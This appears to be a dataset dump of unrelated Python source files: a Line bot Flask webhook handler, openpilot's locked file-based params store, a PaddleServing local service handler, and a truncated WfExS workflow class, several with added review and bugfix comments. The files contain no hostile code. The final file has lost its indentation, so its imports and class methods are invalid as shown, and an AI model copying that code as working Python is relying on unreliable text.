source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
# Module for server
from flask import request, abort
# Module for Line SDK
from linebot.exceptions import (
InvalidSignatureError
)
from linebot.models import (
MessageEvent, JoinEvent,
MemberJoinedEvent, MemberLeftEvent,
UnfollowEvent, FollowEvent,PostbackEvent
)
# Module for event handler
from event import (message,join,postback)
# Module for delay
from time import sleep
# Module for logging
import logging
# Module for multi-threading
import threading
# Homepage content
def index():
    """Serve the minimal homepage markup shown at the root URL."""
    return "<h1> Apa? </h1>"
# Line bot handler
def handler(app, parser, line_bot_api):
    """Flask view for the Line webhook.

    Verifies the request signature, then hands the parsed events to a
    background thread (eventHandler) so the webhook can answer quickly.

    BUGFIX: a request missing the X-Line-Signature header used to raise
    KeyError (HTTP 500); it now aborts with 400 like any invalid signature.
    The pointless fixed sleep(0.01) before spawning the worker was removed.

    :param app: the Flask application (used for logging)
    :param parser: linebot WebhookParser used to validate and parse the body
    :param line_bot_api: linebot API client forwarded to the event handlers
    :return: 'OK' once the worker thread has been started
    """
    signature = request.headers.get('X-Line-Signature')
    if signature is None:
        abort(400)
    # NOTE(review): basicConfig only takes effect on its first call; it is kept
    # for compatibility but really belongs in application startup code.
    logging.basicConfig(level=logging.DEBUG, format='%(asctime)s - %(message)s', datefmt='%d-%b-%y %H:%M:%S')
    # Get request body as text
    body = request.get_data(as_text=True)
    app.logger.info("Request body: " + body)
    # Parse webhook body; reject anything whose signature does not check out.
    try:
        events = parser.parse(body, signature)
    except InvalidSignatureError:
        abort(400)
    # Process the events off-thread so this view returns immediately.
    thread = threading.Thread(target=eventHandler, args=(app, events, line_bot_api))
    thread.start()
    return 'OK'
def eventHandler(app, events, line_bot_api):
    """Route each parsed Line event to the handler matching its type.

    Events of types without a registered handler are silently ignored,
    exactly as the original if/elif chain did.
    """
    dispatch = (
        (MessageEvent, message.MessageHandler),
        (JoinEvent, join.JoinHandler),
        (PostbackEvent, postback.PostbackHandler),
    )
    for incoming in events:
        for event_cls, handle in dispatch:
            if isinstance(incoming, event_cls):
                handle(incoming, line_bot_api)
                break
|
#!/usr/bin/env python3
"""ROS has a parameter server, we have files.
The parameter store is a persistent key value store, implemented as a directory with a writer lock.
On Android, we store params under params_dir = /data/params. The writer lock is a file
"<params_dir>/.lock" taken using flock(), and data is stored in a directory symlinked to by
"<params_dir>/d".
Each key, value pair is stored as a file with named <key> with contents <value>, located in
<params_dir>/d/<key>
Readers of a single key can just open("<params_dir>/d/<key>") and read the file contents.
Readers who want a consistent snapshot of multiple keys should take the lock.
Writers should take the lock before modifying anything. Writers should also leave the DB in a
consistent state after a crash. The implementation below does this by copying all params to a temp
directory <params_dir>/<tmp>, then atomically symlinking <params_dir>/<d> to <params_dir>/<tmp>
before deleting the old <params_dir>/<d> directory.
Writers that only modify a single key can simply take the lock, then swap the corresponding value
file in place without messing with <params_dir>/d.
"""
import time
import os
import errno
import sys
import shutil
import fcntl
import tempfile
import threading
from enum import Enum
def mkdirs_exists_ok(path):
    """Create path (and any missing parents), tolerating a directory that
    already exists; any other failure is propagated."""
    try:
        os.makedirs(path)
    except OSError:
        if os.path.isdir(path):
            return
        raise
class TxType(Enum):
    """Lifecycle policy attached to each parameter key: when (if ever) the
    stored value is cleared automatically."""
    PERSISTENT = 1                  # never cleared automatically
    CLEAR_ON_MANAGER_START = 2      # wiped by Params.manager_start()
    CLEAR_ON_PANDA_DISCONNECT = 3   # wiped by Params.panda_disconnect()
    CLEAR_ON_CAR_START = 4          # wiped by Params.car_start()
class UnknownKeyName(Exception):
    """Raised when Params.get/put is called with a key absent from `keys`."""
    pass
# Registry of every known parameter key, mapped to the list of TxType
# lifecycle policies that apply to it. Params.get/put reject keys that are
# not listed here, and Params._clear_keys_with_type uses the policies to
# decide which values to wipe on the corresponding lifecycle events.
keys = {
    "AccessToken": [TxType.PERSISTENT],
    "AthenadPid": [TxType.PERSISTENT],
    "CalibrationParams": [TxType.PERSISTENT],
    "CarParams": [TxType.CLEAR_ON_CAR_START],  # previously CLEAR_ON_MANAGER_START + CLEAR_ON_PANDA_DISCONNECT
    "CarVin": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],  # previously PERSISTENT
    "CompletedTrainingVersion": [TxType.PERSISTENT],
    "ControlsParams": [TxType.PERSISTENT],
    "DoUninstall": [TxType.CLEAR_ON_MANAGER_START],
    "DongleId": [TxType.PERSISTENT],
    "GitBranch": [TxType.PERSISTENT],
    "GitCommit": [TxType.PERSISTENT],
    "GitRemote": [TxType.PERSISTENT],
    "GithubSshKeys": [TxType.PERSISTENT],
    "HasAcceptedTerms": [TxType.PERSISTENT],
    "HasCompletedSetup": [TxType.PERSISTENT],
    "IsGeofenceEnabled": [TxType.PERSISTENT],
    "IsMetric": [TxType.PERSISTENT],
    "IsRHD": [TxType.PERSISTENT],
    "IsUpdateAvailable": [TxType.PERSISTENT],
    "IsUploadRawEnabled": [TxType.PERSISTENT],
    "IsUploadVideoOverCellularEnabled": [TxType.PERSISTENT],
    "LastUpdateTime": [TxType.PERSISTENT],
    "LimitSetSpeed": [TxType.PERSISTENT],
    "LimitSetSpeedNeural": [TxType.PERSISTENT],
    "LiveParameters": [TxType.PERSISTENT],
    "LongitudinalControl": [TxType.PERSISTENT],
    "OpenpilotEnabledToggle": [TxType.PERSISTENT],
    "PandaFirmware": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
    "PandaDongleId": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
    "Passive": [TxType.PERSISTENT],
    "RecordFront": [TxType.PERSISTENT],
    "ReleaseNotes": [TxType.PERSISTENT],
    "ShouldDoUpdate": [TxType.CLEAR_ON_MANAGER_START],
    "SpeedLimitOffset": [TxType.PERSISTENT],
    "SubscriberInfo": [TxType.PERSISTENT],
    "TermsVersion": [TxType.PERSISTENT],
    "TrainingVersion": [TxType.PERSISTENT],
    "UpdateAvailable": [TxType.CLEAR_ON_MANAGER_START],
    "Version": [TxType.PERSISTENT],
    "Offroad_ChargeDisabled": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
    "Offroad_ConnectivityNeeded": [TxType.CLEAR_ON_MANAGER_START],
    "Offroad_ConnectivityNeededPrompt": [TxType.CLEAR_ON_MANAGER_START],
    "Offroad_TemperatureTooHigh": [TxType.CLEAR_ON_MANAGER_START],
    "Offroad_PandaFirmwareMismatch": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
    "Offroad_InvalidTime": [TxType.CLEAR_ON_MANAGER_START],
}
def fsync_dir(path):
    """fsync a directory so directory-entry changes (renames, new files)
    actually reach the disk before we proceed."""
    dir_fd = os.open(path, os.O_RDONLY)
    try:
        os.fsync(dir_fd)
    finally:
        os.close(dir_fd)
class FileLock():
    """Advisory exclusive lock on a file, implemented with flock().

    `path` is the lock-file location; `create` controls whether the file is
    created (O_CREAT) when missing. Closing the fd releases the flock, so
    release() simply closes. Context-manager support was added (a
    backward-compatible generalization) so callers can write
    `with FileLock(path, True): ...` instead of manual acquire/release.
    """

    def __init__(self, path, create):
        self._path = path
        self._create = create
        self._fd = None

    def acquire(self):
        """Open the lock file and block until the exclusive lock is held."""
        self._fd = os.open(self._path, os.O_CREAT if self._create else 0)
        fcntl.flock(self._fd, fcntl.LOCK_EX)

    def release(self):
        """Release the lock; safe to call when not held (idempotent)."""
        if self._fd is not None:
            os.close(self._fd)
            self._fd = None

    def __enter__(self):
        self.acquire()
        return self

    def __exit__(self, exc_type, exc_value, traceback):
        self.release()
        return False
class DBAccessor():
    """Shared plumbing for reading the on-disk params DB.

    Subclasses implement __enter__/__exit__ to populate self._vals with a
    snapshot of <path>/d; until then every accessor raises.
    """

    def __init__(self, path):
        self._path = path
        self._vals = None

    def keys(self):
        """Key names present in the snapshot (requires __enter__ first)."""
        self._check_entered()
        return self._vals.keys()

    def get(self, key):
        """Raw bytes stored for key, or None when the key is absent."""
        self._check_entered()
        return self._vals.get(key)

    def _get_lock(self, create):
        """Acquire and return the DB-wide FileLock."""
        lock = FileLock(os.path.join(self._path, ".lock"), create)
        lock.acquire()
        return lock

    def _read_values_locked(self):
        """Read every key file under <path>/d. Callers should hold the lock."""
        vals = {}
        try:
            data_path = self._data_path()
            for name in os.listdir(data_path):
                with open(os.path.join(data_path, name), "rb") as fh:
                    vals[name] = fh.read()
        except (OSError, IOError) as err:
            # A DB that was never created (or left half-built) reads as empty.
            if err.errno == errno.ENOENT:
                return {}
            # Any other error falls through and yields whatever was read so
            # far, matching the original behavior.
        return vals

    def _data_path(self):
        return os.path.join(self._path, "d")

    def _check_entered(self):
        if self._vals is None:
            raise Exception("Must call __enter__ before using DB")
class DBReader(DBAccessor):
    """Context manager giving a consistent read-only snapshot of the DB."""

    def __enter__(self):
        try:
            lock = self._get_lock(False)
        except OSError as e:
            # Do not create lock if it does not exist: no lock file means the
            # DB was never created, so return an empty snapshot.
            if e.errno == errno.ENOENT:
                self._vals = {}
                return self
            # BUGFIX: previously any other OSError fell through with `lock`
            # unbound, so lock.release() in the finally below raised a
            # confusing NameError. Propagate the real error instead.
            raise
        try:
            # Read everything under the lock for a consistent snapshot.
            self._vals = self._read_values_locked()
            return self
        finally:
            lock.release()

    def __exit__(self, type, value, traceback):
        pass
class DBWriter(DBAccessor):
    """Context manager for atomically updating the params DB.

    On __enter__ it takes the DB lock and snapshots all current values; put()
    and delete() mutate that in-memory snapshot; __exit__ writes the whole
    snapshot to a fresh directory and atomically swaps the <path>/d symlink
    onto it, so readers always see either the old or the new state.
    """

    def __init__(self, path):
        super(DBWriter, self).__init__(path)
        self._lock = None          # FileLock held between __enter__/__exit__
        self._prev_umask = None    # umask saved so 0o777/0o666 modes apply

    def put(self, key, value):
        """Stage a value (bytes) for key; written on __exit__."""
        self._vals[key] = value

    def delete(self, key):
        """Stage removal of key; no-op if it is absent."""
        self._vals.pop(key, None)

    def __enter__(self):
        mkdirs_exists_ok(self._path)
        # Make sure we can write and that permissions are correct.
        self._prev_umask = os.umask(0)
        try:
            os.chmod(self._path, 0o777)
            self._lock = self._get_lock(True)
            self._vals = self._read_values_locked()
        except:
            # Restore the umask before propagating; the bare except is
            # deliberate here since it always re-raises.
            os.umask(self._prev_umask)
            self._prev_umask = None
            raise
        return self

    def __exit__(self, type, value, traceback):
        self._check_entered()
        try:
            # data_path refers to the externally used path to the params. It is a symlink.
            # old_data_path is the path currently pointed to by data_path.
            # tempdir_path is a path where the new params will go, which the new data path will point to.
            # new_data_path is a temporary symlink that will atomically overwrite data_path.
            #
            # The current situation is:
            #   data_path -> old_data_path
            # We're going to write params data to tempdir_path
            #   tempdir_path -> params data
            # Then point new_data_path to tempdir_path
            #   new_data_path -> tempdir_path
            # Then atomically overwrite data_path with new_data_path
            #   data_path -> tempdir_path
            old_data_path = None
            new_data_path = None
            tempdir_path = tempfile.mkdtemp(prefix=".tmp", dir=self._path)
            try:
                # Write back all keys, fsyncing each file so the new tree is
                # durable before the symlink swap makes it visible.
                os.chmod(tempdir_path, 0o777)
                for k, v in self._vals.items():
                    with open(os.path.join(tempdir_path, k), "wb") as f:
                        f.write(v)
                        f.flush()
                        os.fsync(f.fileno())
                fsync_dir(tempdir_path)
                data_path = self._data_path()
                try:
                    old_data_path = os.path.join(self._path, os.readlink(data_path))
                except (OSError, IOError):
                    # NOTE(mgraczyk): If other DB implementations have bugs, this could cause
                    # copies to be left behind, but we still want to overwrite.
                    pass
                new_data_path = "{}.link".format(tempdir_path)
                os.symlink(os.path.basename(tempdir_path), new_data_path)
                # rename() over an existing symlink is the atomic commit point.
                os.rename(new_data_path, data_path)
                fsync_dir(self._path)
            finally:
                # If the rename worked, we can delete the old data. Otherwise delete the new one.
                # NOTE(review): if mkdtemp itself raised, data_path is unbound
                # here and this would NameError — confirm whether that path is
                # reachable in practice.
                success = new_data_path is not None and os.path.exists(data_path) and (
                    os.readlink(data_path) == os.path.basename(tempdir_path))
                if success:
                    if old_data_path is not None:
                        shutil.rmtree(old_data_path)
                else:
                    shutil.rmtree(tempdir_path)
                # Regardless of what happened above, there should be no link at new_data_path.
                if new_data_path is not None and os.path.islink(new_data_path):
                    os.remove(new_data_path)
        finally:
            os.umask(self._prev_umask)
            self._prev_umask = None
            # Always release the lock.
            self._lock.release()
            self._lock = None
def read_db(params_path, key):
    """Lock-free single-key read: return the raw bytes stored under
    <params_path>/d/<key>, or None when the key cannot be read."""
    key_path = "%s/d/%s" % (params_path, key)
    try:
        with open(key_path, "rb") as fh:
            return fh.read()
    except IOError:
        return None
def write_db(params_path, key, value):
    """Atomically write a single key under the DB lock.

    The value is written to a temp file in params_path, fsynced, then
    renamed over <params_path>/d/<key>, so readers never observe a partial
    value. str values are encoded as UTF-8.

    BUGFIX: tempfile.mktemp (deprecated, race-prone: the name can be taken
    between the call and the open) was replaced with tempfile.mkstemp,
    which creates the file atomically. mkstemp creates the file 0o600, so
    it is chmod'ed to 0o666 to match what open() produced under umask 0.
    """
    if isinstance(value, str):
        value = value.encode('utf8')
    prev_umask = os.umask(0)
    lock = FileLock(params_path + "/.lock", True)
    lock.acquire()
    try:
        tmp_fd, tmp_path = tempfile.mkstemp(prefix=".tmp", dir=params_path)
        with os.fdopen(tmp_fd, "wb") as f:
            f.write(value)
            f.flush()
            os.fsync(f.fileno())
        os.chmod(tmp_path, 0o666)
        path = "%s/d/%s" % (params_path, key)
        # rename() is the atomic commit; fsync the directory so it's durable.
        os.rename(tmp_path, path)
        fsync_dir(os.path.dirname(path))
    finally:
        os.umask(prev_umask)
        lock.release()
class Params():
    """High-level interface to the on-disk key/value params DB: validated
    single-key reads/writes plus lifecycle-based clearing."""

    def __init__(self, db='/data/params'):
        self.db = db
        # Materialize the DB directory structure on first use.
        if not os.path.exists(self.db + "/d"):
            with self.transaction(write=True):
                pass

    def transaction(self, write=False):
        """Return a DBWriter (write=True) or DBReader context manager."""
        return DBWriter(self.db) if write else DBReader(self.db)

    def _clear_keys_with_type(self, tx_type):
        """Delete every registered key whose policy list contains tx_type."""
        with self.transaction(write=True) as txn:
            for name, policies in keys.items():
                if tx_type in policies:
                    txn.delete(name)

    def manager_start(self):
        self._clear_keys_with_type(TxType.CLEAR_ON_MANAGER_START)

    def panda_disconnect(self):
        self._clear_keys_with_type(TxType.CLEAR_ON_PANDA_DISCONNECT)

    def car_start(self):
        self._clear_keys_with_type(TxType.CLEAR_ON_CAR_START)

    def delete(self, key):
        with self.transaction(write=True) as txn:
            txn.delete(key)

    def get(self, key, block=False, encoding=None):
        """Read a key's value (bytes, or decoded when encoding is given).

        With block=True, polls until the key exists. Raises UnknownKeyName
        for keys not in the registry.
        """
        if key not in keys:
            raise UnknownKeyName(key)
        ret = read_db(self.db, key)
        while block and ret is None:
            # is polling really the best we can do?
            time.sleep(0.05)
            ret = read_db(self.db, key)
        if ret is not None and encoding is not None:
            ret = ret.decode(encoding)
        return ret

    def put(self, key, dat):
        """
        Warning: This function blocks until the param is written to disk!
        In very rare cases this can take over a second, and your code will hang.
        Use the put_nonblocking helper function in time sensitive code, but
        in general try to avoid writing params as much as possible.
        """
        if key not in keys:
            raise UnknownKeyName(key)
        write_db(self.db, key, dat)
def put_nonblocking(key, val):
    """Write a param from a background thread so the caller never blocks on
    disk I/O; returns the already-started Thread."""
    def _writer(key, val):
        Params().put(key, val)
    worker = threading.Thread(target=_writer, args=(key, val))
    worker.start()
    return worker
if __name__ == "__main__":
    # CLI helper: `params.py <key> <value>` writes; no args dumps all keys.
    params = Params()
    if len(sys.argv) > 2:
        params.put(sys.argv[1], sys.argv[2])
    else:
        for k in keys:
            pp = params.get(k)  # bytes or None (no encoding requested)
            if pp is None:
                print("%s is None" % k)
            # BUGFIX: iterating bytes yields ints, so the old
            # `ord(c)` raised TypeError and `.encode("hex")` does not exist
            # in Python 3. Compare the ints directly and use bytes.hex().
            elif all(32 <= b < 128 for b in pp):
                print("%s = %s" % (k, pp.decode("ascii")))
            else:
                print("%s = %s" % (k, pp.hex()))
    # Test multiprocess:
    # seq 0 100000 | xargs -P20 -I{} python common/params.py DongleId {} && sleep 0.05
    # while python common/params.py DongleId; do sleep 0.05; done
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import logging
import multiprocessing
#from paddle_serving_server_gpu import OpMaker, OpSeqMaker
#from paddle_serving_server_gpu import Server as GpuServer
#from paddle_serving_server import Server as CpuServer
from . import util
#from paddle_serving_app.local_predict import LocalPredictor
# Module-level logger for this handler.
_LOGGER = logging.getLogger(__name__)
# Generates unique "workdir_<n>" working-directory names for servers.
_workdir_name_gen = util.NameGenerator("workdir_")
class LocalServiceHandler(object):
    """
    LocalServiceHandler is the processor of the local service, contains
    three client types, brpc, grpc and local_predictor. If you use the
    brpc or grpc, serving startup ability is provided. If you use
    local_predictor, local predict ability is provided by paddle_serving_app.
    """

    def __init__(self,
                 model_config,
                 client_type='local_predictor',
                 workdir="",
                 thread_num=2,
                 device_type=-1,
                 devices="",
                 fetch_names=None,
                 mem_optim=True,
                 ir_optim=False,
                 available_port_generator=None,
                 use_profile=False):
        """
        Initialization of LocalServiceHandler

        Args:
            model_config: model config path
            client_type: brpc, grpc and local_predictor[default]
            workdir: work directory
            thread_num: number of threads, concurrent quantity.
            device_type: support multiple devices. -1=Not set, determined by
                `devices`. 0=cpu, 1=gpu, 2=tensorRT, 3=arm cpu, 4=kunlun xpu
            devices: gpu id list[gpu], "" default[cpu]
            fetch_names: get fetch names out of LocalServiceHandler in
                local_predictor mode. fetch_names_ is compatible for Client().
            mem_optim: use memory/graphics memory optimization, True default.
            ir_optim: use calculation chart optimization, False default.
            available_port_generator: generate available ports
            use_profile: use profiling, False default.

        Returns:
            None

        Raises:
            ValueError: if device_type is not one of -1, 0, 1, 2, 3, 4.
        """
        if available_port_generator is None:
            available_port_generator = util.GetAvailablePortGenerator()

        self._model_config = model_config
        self._port_list = []
        self._device_name = "cpu"
        self._use_gpu = False
        self._use_trt = False
        self._use_lite = False
        self._use_xpu = False

        if device_type == -1:
            # device_type is not set, determined by `devices`
            if devices == "":
                # CPU
                self._device_name = "cpu"
                devices = [-1]
            else:
                # GPU
                self._device_name = "gpu"
                self._use_gpu = True
                devices = [int(x) for x in devices.split(",")]
        elif device_type == 0:
            # CPU
            self._device_name = "cpu"
            devices = [-1]
        elif device_type == 1:
            # GPU
            self._device_name = "gpu"
            self._use_gpu = True
            devices = [int(x) for x in devices.split(",")]
        elif device_type == 2:
            # Nvidia TensorRT
            self._device_name = "gpu"
            self._use_gpu = True
            devices = [int(x) for x in devices.split(",")]
            self._use_trt = True
        elif device_type == 3:
            # ARM CPU
            self._device_name = "arm"
            devices = [-1]
            self._use_lite = True
        elif device_type == 4:
            # Kunlun XPU
            self._device_name = "arm"
            devices = [int(x) for x in devices.split(",")]
            self._use_lite = True
            self._use_xpu = True
        else:
            _LOGGER.error(
                "LocalServiceHandler initialization fail. device_type={}"
                .format(device_type))
            # BUGFIX: previously only logged and fell through with `devices`
            # still a string, causing an obscure failure later. Fail fast.
            raise ValueError(
                "LocalServiceHandler initialization fail. device_type={}"
                .format(device_type))

        if client_type == "brpc" or client_type == "grpc":
            for _ in devices:
                self._port_list.append(available_port_generator.next())
            _LOGGER.info("Create ports for devices:{}. Port:{}"
                         .format(devices, self._port_list))

        self._client_type = client_type
        self._workdir = workdir
        self._devices = devices
        self._thread_num = thread_num
        self._mem_optim = mem_optim
        self._ir_optim = ir_optim
        self._local_predictor_client = None
        self._rpc_service_list = []
        self._server_pros = []
        self._use_profile = use_profile
        self._fetch_names = fetch_names

        _LOGGER.info(
            "Models({}) will be launched by device {}. use_gpu:{}, "
            "use_trt:{}, use_lite:{}, use_xpu:{}, device_type:{}, devices:{}, "
            "mem_optim:{}, ir_optim:{}, use_profile:{}, thread_num:{}, "
            "client_type:{}, fetch_names:{}".format(
                model_config, self._device_name, self._use_gpu, self._use_trt,
                self._use_lite, self._use_xpu, device_type, self._devices,
                self._mem_optim, self._ir_optim, self._use_profile,
                self._thread_num, self._client_type, self._fetch_names))

    def get_fetch_list(self):
        """Return the fetch names configured (or discovered) for the model."""
        return self._fetch_names

    def get_port_list(self):
        """Return the ports allocated for brpc/grpc servers."""
        return self._port_list

    def get_client(self, concurrency_idx):
        """
        Function get_client is only used for local predictor case, creates one
        LocalPredictor object, and initializes the paddle predictor by function
        load_model_config. The concurrency_idx is used to select running devices.

        Args:
            concurrency_idx: process/thread index

        Returns:
            _local_predictor_client
        """
        # Checking the legality of concurrency_idx.
        device_num = len(self._devices)
        if device_num <= 0:
            # BUGFIX: the message used to read "must be not greater than 0",
            # which said the opposite of the check.
            _LOGGER.error("device_num must be greater than 0. devices({})".
                          format(self._devices))
            raise ValueError("The number of self._devices error")

        if concurrency_idx < 0:
            _LOGGER.error("concurrency_idx({}) must be one positive number".
                          format(concurrency_idx))
            concurrency_idx = 0
        elif concurrency_idx >= device_num:
            # Wrap around so any worker index maps onto a device.
            concurrency_idx = concurrency_idx % device_num

        _LOGGER.info("GET_CLIENT : concurrency_idx={}, device_num={}".format(
            concurrency_idx, device_num))
        from paddle_serving_app.local_predict import LocalPredictor
        if self._local_predictor_client is None:
            self._local_predictor_client = LocalPredictor()
            self._local_predictor_client.load_model_config(
                model_path=self._model_config,
                use_gpu=self._use_gpu,
                gpu_id=self._devices[concurrency_idx],
                use_profile=self._use_profile,
                thread_num=self._thread_num,
                mem_optim=self._mem_optim,
                ir_optim=self._ir_optim,
                use_trt=self._use_trt,
                use_lite=self._use_lite,
                use_xpu=self._use_xpu)
        return self._local_predictor_client

    def get_client_config(self):
        """Path of the serving client/server config for this model."""
        return os.path.join(self._model_config, "serving_server_conf.prototxt")

    def _prepare_one_server(self, workdir, port, gpuid, thread_num, mem_optim,
                            ir_optim):
        """
        According to self._device_name, generating one Cpu/Gpu/Arm Server, and
        setting the model config and startup params.

        Args:
            workdir: work directory
            port: network port
            gpuid: gpu id
            thread_num: thread num
            mem_optim: use memory/graphics memory optimization
            ir_optim: use calculation chart optimization

        Returns:
            server: CpuServer/GpuServer
        """
        if self._device_name == "cpu":
            from paddle_serving_server import OpMaker, OpSeqMaker, Server
            op_maker = OpMaker()
            read_op = op_maker.create('general_reader')
            general_infer_op = op_maker.create('general_infer')
            general_response_op = op_maker.create('general_response')

            op_seq_maker = OpSeqMaker()
            op_seq_maker.add_op(read_op)
            op_seq_maker.add_op(general_infer_op)
            op_seq_maker.add_op(general_response_op)

            server = Server()
        else:
            # gpu or arm
            from paddle_serving_server_gpu import OpMaker, OpSeqMaker, Server
            op_maker = OpMaker()
            read_op = op_maker.create('general_reader')
            general_infer_op = op_maker.create('general_infer')
            general_response_op = op_maker.create('general_response')

            op_seq_maker = OpSeqMaker()
            op_seq_maker.add_op(read_op)
            op_seq_maker.add_op(general_infer_op)
            op_seq_maker.add_op(general_response_op)

            server = Server()
            if gpuid >= 0:
                server.set_gpuid(gpuid)
            # TODO: support arm or arm + xpu later
            server.set_device(self._device_name)

        server.set_op_sequence(op_seq_maker.get_op_sequence())
        server.set_num_threads(thread_num)
        server.set_memory_optimize(mem_optim)
        server.set_ir_optimize(ir_optim)

        server.load_model_config(self._model_config)
        server.prepare_server(
            workdir=workdir, port=port, device=self._device_name)
        if self._fetch_names is None:
            self._fetch_names = server.get_fetch_list()
        return server

    def _start_one_server(self, service_idx):
        """
        Start one server

        Args:
            service_idx: server index

        Returns:
            None
        """
        self._rpc_service_list[service_idx].run_server()

    def prepare_server(self):
        """
        Prepare all servers to be started, and append them into list.
        """
        for i, device_id in enumerate(self._devices):
            if self._workdir != "":
                workdir = "{}_{}".format(self._workdir, i)
            else:
                workdir = _workdir_name_gen.next()
            self._rpc_service_list.append(
                self._prepare_one_server(
                    workdir,
                    self._port_list[i],
                    device_id,
                    thread_num=self._thread_num,
                    mem_optim=self._mem_optim,
                    ir_optim=self._ir_optim))

    def start_server(self):
        """
        Start multiple processes and start one server in each process
        """
        for i, _ in enumerate(self._rpc_service_list):
            p = multiprocessing.Process(
                target=self._start_one_server, args=(i, ))
            p.daemon = True
            self._server_pros.append(p)
        for p in self._server_pros:
            p.start()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2020-2021 Barcelona Supercomputing Center (BSC), Spain
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
import atexit
import http
import io
import json
import jsonschema
import logging
import pathlib
import platform
import shutil
import sys
import threading
import time
import types
import uuid
from pathlib import Path
from typing import List, Mapping, Pattern, Tuple, Union
from urllib import request, parse
from rocrate import rocrate
import bagit
# We have preference for the C based loader and dumper, but the code
# should fallback to default implementations when C ones are not present
try:
from yaml import CLoader as YAMLLoader, CDumper as YAMLDumper
except ImportError:
from yaml import Loader as YAMLLoader, Dumper as YAMLDumper
import yaml
import crypt4gh.lib
import crypt4gh.keys
from .common import *
from .encrypted_fs import *
from .engine import WorkflowEngine, WorkflowEngineException
from .engine import WORKDIR_WORKFLOW_META_FILE, WORKDIR_SECURITY_CONTEXT_FILE, WORKDIR_PASSPHRASE_FILE
from .engine import WORKDIR_MARSHALLED_STAGE_FILE, WORKDIR_MARSHALLED_EXECUTE_FILE, WORKDIR_MARSHALLED_EXPORT_FILE
from .engine import WORKDIR_INPUTS_RELDIR, WORKDIR_INTERMEDIATE_RELDIR, WORKDIR_META_RELDIR, WORKDIR_OUTPUTS_RELDIR, \
WORKDIR_ENGINE_TWEAKS_RELDIR
from .cache_handler import SchemeHandlerCacheHandler
from .utils.marshalling_handling import marshall_namedtuple, unmarshall_namedtuple
from .fetchers import DEFAULT_SCHEME_HANDLERS
from .fetchers.pride import SCHEME_HANDLERS as PRIDE_SCHEME_HANDLERS
from .fetchers.trs_files import INTERNAL_TRS_SCHEME_PREFIX, SCHEME_HANDLERS as INTERNAL_TRS_SCHEME_HANDLERS
from .nextflow_engine import NextflowWorkflowEngine
from .cwl_engine import CWLWorkflowEngine
# The list of workflow engine classes to be taken into account.
# CWL detection goes first, as the Nextflow detector is a bit lax
# (it only looks for a couple of too-common keywords).
WORKFLOW_ENGINE_CLASSES = [
    CWLWorkflowEngine,
    NextflowWorkflowEngine,
]
class WF:
    """
    Workflow enaction class
    """

    # Number of words drawn for generated crypt4gh key passphrases
    DEFAULT_PASSPHRASE_LENGTH = 4

    # Names of the crypt4gh entries in the local configuration
    CRYPT4GH_SECTION = 'crypt4gh'
    CRYPT4GH_PRIVKEY_KEY = 'key'
    CRYPT4GH_PUBKEY_KEY = 'pub'
    CRYPT4GH_PASSPHRASE_KEY = 'passphrase'

    # Filenames used to cache GA4GH TRS responses
    TRS_METADATA_FILE = 'trs_metadata.json'
    TRS_QUERY_CACHE_FILE = 'trs_result.json'
    TRS_TOOL_FILES_FILE = 'trs_tool_files.json'

    # JSON schema locations, relative to this module
    SCHEMAS_REL_DIR = 'schemas'
    CONFIG_SCHEMA = 'config.json'
    SECURITY_CONTEXT_SCHEMA = 'security-context.json'
    STAGE_DEFINITION_SCHEMA = 'stage-definition.json'

    DEFAULT_RO_EXTENSION = ".crate.zip"
    DEFAULT_TRS_ENDPOINT = "https://dev.workflowhub.eu/ga4gh/trs/v2/"  # root of GA4GH TRS API
    TRS_TOOLS_PATH = 'tools/'

    # One WorkflowType instance per engine class, plus a lookup table keyed
    # by the TRS descriptor name (e.g. "CWL", "NFL")
    WORKFLOW_ENGINES = list(map(lambda clazz: clazz.WorkflowType(), WORKFLOW_ENGINE_CLASSES))
    RECOGNIZED_TRS_DESCRIPTORS = dict(map(lambda t: (t.trs_descriptor, t), WORKFLOW_ENGINES))
@classmethod
def generate_passphrase(cls) -> str:
    """Build a random passphrase of DEFAULT_PASSPHRASE_LENGTH words, drawn
    from a randomly chosen pwgen_passphrase wordlist."""
    import random
    from pwgen_passphrase.__main__ import generate_passphrase, list_wordlists, read_wordlist

    available = list_wordlists()
    tags = [*available.keys()]
    chosen = available[tags[random.randrange(len(tags))]]
    words = read_wordlist(chosen).splitlines()

    return generate_passphrase(words, cls.DEFAULT_PASSPHRASE_LENGTH)
@classmethod
def bootstrap(cls, local_config, config_directory=None, key_prefix=None):
    """
    Ensure the working directory and the crypt4gh key pair exist, creating
    them (and recording their names in local_config, which is mutated in
    place) when missing.

    :param local_config: Relevant local configuration, like the cache directory.
    :param config_directory: The filename to be used to resolve relative paths
    :param key_prefix: Prefix for the default (hidden) key filenames
    :type local_config: dict
    :return: (updated, local_config) — `updated` is True when new entries
        were added to local_config
    :raises WFException: when exactly one of the two key files is usable
    """
    import datetime
    import socket

    # NOTE(review): `os` is expected to arrive via `from .common import *`
    # (it is not imported directly in this module) — confirm.
    logger = logging.getLogger(cls.__name__)
    updated = False

    # Getting the config directory
    if config_directory is None:
        config_directory = os.getcwd()
    if not os.path.isabs(config_directory):
        config_directory = os.path.abspath(config_directory)

    if key_prefix is None:
        key_prefix = ''

